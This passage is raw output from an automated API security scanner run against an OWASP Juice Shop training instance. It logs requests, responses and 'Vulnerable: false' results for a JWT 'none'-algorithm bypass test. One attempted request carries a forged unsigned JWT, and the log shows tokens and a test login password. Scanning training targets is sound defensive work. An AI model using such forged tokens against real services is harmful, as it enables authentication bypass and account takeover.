AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"97-y0r9TBZWs55FMZphKTMDOIF+khg\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"151","Date":"Thu, 09 Mar 2023 14:50:55 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":[{"product":"24","message":"good apple","author":"victim@gmail.com","likesCount":0,"likedBy":[],"_id":"n9Ai6N6JY8vwKK4sv"}]}
Attempted errors : 
Error 1: Request API failed authentication check, skipping execution


 ------------------------------------ 

API: https://juiceshop.akto.io/rest/products/search GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"325f-tM0qOaZXr+dGhzlHPS2N1JpgSNY\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"12895","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classic.","price":1.99,"deluxePrice":0.99,"image":"apple_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":24,"name":"Apple Pomace","description":"Finest pressings of apples. Allergy disclaimer: Might contain traces of worms. Can be <a href=\"/#recycle\">sent back to us</a> for recycling.","price":0.89,"deluxePrice":0.89,"image":"apple_pressings.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":6,"name":"Banana Juice (1000ml)","description":"Monkeys love it the most.","price":1.99,"deluxePrice":1.99,"image":"banana_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":42,"name":"Best Juice Shop Salesman Artwork","description":"Unique digital painting depicting Stan, our most qualified and almost profitable salesman. He made a succesful carreer in selling used ships, coffins, krypts, crosses, real estate, life insurance, restaurant supplies, voodoo enhanced asbestos and courtroom souvenirs before <em>finally</em> adding his expertise to the Juice Shop marketing team.","price":5000,"deluxePrice":5000,"image":"artwork2.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":30,"name":"Carrot Juice (1000ml)","description":"As the old German saying goes: \"Carrots are good for the eyes. Or has anyone ever seen a rabbit with glasses?\"","price":2.99,"deluxePrice":2.99,"image":"carrot_juice.jpeg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":3,"name":"Eggfruit Juice (500ml)","description":"Now with even more exotic flavour.","price":8.99,"deluxePrice":8.99,"image":"eggfruit_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":25,"name":"Fruit Press","description":"Fruits go in. Juice comes out. Pomace you can send back to us for recycling purposes.","price":89.99,"deluxePrice":89.99,"image":"fruit_press.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":22,"name":"Green Smoothie","description":"Looks poisonous but is actually very good for your health! Made from green cabbage, spinach, kiwi and grass.","price":1.99,"deluxePrice":1.99,"image":"green_smoothie.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":41,"name":"Juice Shop \"Permafrost\" 2020 Edition","description":"Exact version of <a href=\"https://github.com/juice-shop/juice-shop/releases/tag/v9.3.1-PERMAFROST\">OWASP Juice Shop that was archived on 02/02/2020</a> by the GitHub Archive Program and ultimately went into the <a href=\"https://github.blog/2020-07-16-github-archive-program-the-journey-of-the-worlds-open-source-code-to-the-arctic\">Arctic Code Vault</a> on July 8. 2020 where it will be safely stored for at least 1000 years.","price":9999.99,"deluxePrice":9999.99,"image":"permafrost.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":5,"name":"Lemon Juice (500ml)","description":"Sour but full of vitamins.","price":2.99,"deluxePrice":1.99,"image":"lemon_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":33,"name":"Melon Bike (Comeback-Product 2018 Edition)","description":"The wheels of this bicycle are made from real water melons. You might not want to ride it up/down the curb too hard.","price":2999,"deluxePrice":2999,"image":"melon_bike.jpeg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":38,"name":"OWASP Juice Shop \"King of the Hill\" Facemask","description":"Facemask with compartment for filter from 50% cotton and 50% polyester.","price":13.49,"deluxePrice":13.49,"image":"fan_facemask.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":8,"name":"OWASP Juice Shop CTF Girlie-Shirt","description":"For serious Capture-the-Flag heroines only!","price":22.49,"deluxePrice":22.49,"image":"fan_girlie.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":43,"name":"OWASP Juice Shop Card (non-foil)","description":"Mythic rare <small><em>(obviously...)</em></small> card \"OWASP Juice Shop\" with three distinctly useful abilities. Alpha printing, mint condition. A true collectors piece to own!","price":1000,"deluxePrice":1000,"image":"card_alpha.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":34,"name":"OWASP Juice Shop Coaster (10pcs)","description":"Our 95mm circle coasters are printed in full color and made from thick, premium coaster board.","price":19.99,"deluxePrice":19.99,"image":"coaster.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":37,"name":"OWASP Juice Shop Holographic Sticker","description":"Die-cut holographic sticker. Stand out from those 08/15-sticker-covered laptops with this shiny beacon of 80's coolness!","price":2,"deluxePrice":2,"image":"holo_sticker.png","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":19,"name":"OWASP Juice Shop Hoodie","description":"Mr. Robot-style apparel. But in black. And with logo.","price":49.99,"deluxePrice":49.99,"image":"fan_hoodie.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":13,"name":"OWASP Juice Shop Iron-Ons (16pcs)","description":"Upgrade your clothes with washer safe <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">iron-ons</a> of the OWASP Juice Shop or CTF Extension logo!","price":14.99,"deluxePrice":14.99,"image":"iron-on.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":26,"name":"OWASP Juice Shop Logo (3D-printed)","description":"This rare item was designed and handcrafted in Sweden. This is why it is so incredibly expensive despite its complete lack of purpose.","price":99.99,"deluxePrice":99.99,"image":"3d_keychain.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":14,"name":"OWASP Juice Shop Magnets (16pcs)","description":"Your fridge will be even cooler with these OWASP Juice Shop or CTF Extension logo <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">magnets</a>!","price":15.99,"deluxePrice":15.99,"image":"magnets.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":18,"name":"OWASP Juice Shop Mug","description":"Black mug with regular logo on one side and CTF logo on the other! Your colleagues will envy you!","price":21.99,"deluxePrice":21.99,"image":"fan_mug.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":15,"name":"OWASP Juice Shop Sticker Page","description":"Massive decoration opportunities with these OWASP Juice Shop or CTF Extension <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">sticker pages</a>! Each page has 16 stickers on it.","price":9.99,"deluxePrice":9.99,"image":"sticker_page.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":16,"name":"OWASP Juice Shop Sticker Single","description":"Super high-quality vinyl <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">sticker single</a> with the OWASP Juice Shop or CTF Extension logo! The ultimate laptop decal!","price":4.99,"deluxePrice":4.99,"image":"sticker_single.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":7,"name":"OWASP Juice Shop T-Shirt","description":"Real fans wear it 24/7!","price":22.49,"deluxePrice":22.49,"image":"fan_shirt.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":17,"name":"OWASP Juice Shop Temporary Tattoos (16pcs)","description":"Get one of these <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">temporary tattoos</a> to proudly wear the OWASP Juice Shop or CTF Extension logo on your skin! If you tweet a photo of yourself with the tattoo, you get a couple of our stickers for free! Please mention <a href=\"https://twitter.com/owasp_juiceshop\" target=\"_blank\"><code>@owasp_juiceshop</code></a> in your tweet!","price":14.99,"deluxePrice":14.99,"image":"tattoo.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":20,"name":"OWASP Juice Shop-CTF Velcro Patch","description":"4x3.5\" embroidered patch with velcro backside. The ultimate decal for every tactical bag or backpack!","price":2.92,"deluxePrice":2.92,"image":"velcro-patch.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":9,"name":"OWASP SSL Advanced Forensic Tool (O-Saft)","description":"O-Saft is an easy to use tool to show information about SSL certificate and tests the SSL connection according given list of ciphers and various SSL configurations. <a href=\"https://www.owasp.org/index.php/O-Saft\" target=\"_blank\">More...</a>","price":0.01,"deluxePrice":0.01,"image":"orange_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":36,"name":"OWASP Snakes and Ladders - Mobile Apps","description":"This amazing mobile app security awareness board game is <a href=\"https://steamcommunity.com/sharedfiles/filedetails/?id=1970691216\">available for Tabletop Simulator on Steam Workshop</a> now!","price":0.01,"deluxePrice":0.01,"image":"snakes_ladders_m.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":35,"name":"OWASP Snakes and Ladders - Web Applications","description":"This amazing web application security awareness board game is <a href=\"https://steamcommunity.com/sharedfiles/filedetails/?id=1969196030\">available for Tabletop Simulator on Steam Workshop</a> now!","price":0.01,"deluxePrice":0.01,"image":"snakes_ladders.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":2,"name":"Orange Juice (1000ml)","description":"Made from oranges hand-picked by Uncle Dittmeyer.","price":2.99,"deluxePrice":2.49,"image":"orange_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":32,"name":"Pwning OWASP Juice Shop","description":"<em>The official Companion Guide</em> by Björn Kimminich available <a href=\"https://leanpub.com/juice-shop\">for free on LeanPub</a> and also <a href=\"https://pwning.owasp-juice.shop\">readable online</a>!","price":5.99,"deluxePrice":5.99,"image":"cover_small.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":23,"name":"Quince Juice (1000ml)","description":"Juice of the <em>Cydonia oblonga</em> fruit. Not exactly sweet but rich in Vitamin C.","price":4.99,"deluxePrice":4.99,"image":"quince.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":4,"name":"Raspberry Juice (1000ml)","description":"Made from blended Raspberry Pi, water and sugar.","price":4.99,"deluxePrice":4.99,"image":"raspberry_juice.jpg","createdAt":"2023-03-09 14:46:29.364 +00:00","updatedAt":"2023-03-09 14:46:29.364 +00:00","deletedAt":null},{"id":29,"name":"Strawberry Juice (500ml)","description":"Sweet & tasty!","price":3.99,"deluxePrice":3.99,"image":"strawberry_juice.jpeg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null},{"id":21,"name":"Woodruff Syrup \"Forest Master X-Treme\"","description":"Harvested and manufactured in the Black Forest, Germany. Can cause hyperactive behavior in children. Can cause permanent green tongue when consumed undiluted.","price":6.99,"deluxePrice":6.99,"image":"woodruff_syrup.jpg","createdAt":"2023-03-09 14:46:29.365 +00:00","updatedAt":"2023-03-09 14:46:29.365 +00:00","deletedAt":null}]}
Attempted errors : 
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution


 ------------------------------------ 

API: https://juiceshop.akto.io/rest/user/login POST
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Origin":"https://juiceshop.akto.io","Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8","Content-Length":"51","Content-Type":"application/json"}
{"email":"victim@gmail.com","password":"victim123"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"33a-CNP0uzn0+OgghHzsSNi62nRjeIw\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"826","Date":"Thu, 09 Mar 2023 14:50:30 GMT","Content-Type":"application/json; charset=utf-8"}
{"authentication":{"token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","bid":6,"umail":"victim@gmail.com"}}
Attempted errors : 
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution


 ------------------------------------ 

API: https://juiceshop.akto.io/rest/user/whoami GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","If-None-Match":"W/\"b-/5bSboVjVhGw3qRgvUfZjE1r1Ns\"","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"78-S3rk6VU9KtrbK5QloaXlT4AKH2s\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"120","Date":"Thu, 09 Mar 2023 14:50:30 GMT","Content-Type":"application/json; charset=utf-8"}
{"user":{"id":21,"email":"victim@gmail.com","lastLoginIp":"","profileImage":"assets/public/images/uploads/default.svg"}}

Attempted request : {url=https://juiceshop.akto.io/rest/user/whoami, method=GET, type=HTTP/1.1, queryParams=null, body=, headers={"sec-fetch-mode":"cors","if-none-match":"W/\"b-/5bSboVjVhGw3qRgvUfZjE1r1Ns\"","sec-fetch-site":"same-origin","cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","accept-language":"en-GB,en-US;q=0.9,en;q=0.8","x-akto-ignore":"0","accept":"application/json, text/plain, */*","authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","host":"juiceshop.akto.io","connection":"close","accept-encoding":"gzip, deflate","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","sec-fetch-dest":"empty"}}

Attempted response: {statusCode=304.0, body=, headers={"date":"Fri, 29 Sep 2023 08:58:24 GMT","access-control-allow-origin":"*","x-content-type-options":"nosniff","x-recruiting":"/#/jobs","x-frame-options":"SAMEORIGIN","etag":"W/\"b-/5bSboVjVhGw3qRgvUfZjE1r1Ns\"","feature-policy":"payment 'self'"}}


 ------------------------------------ 

API: https://juiceshop.akto.io/socket.io/ GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"*/*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"Connection":"close","Content-Length":"1","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"text/plain; charset=UTF-8"}
6
Attempted errors : 
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution


 ------------------------------------ 

API: https://juiceshop.akto.io/socket.io/ POST
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
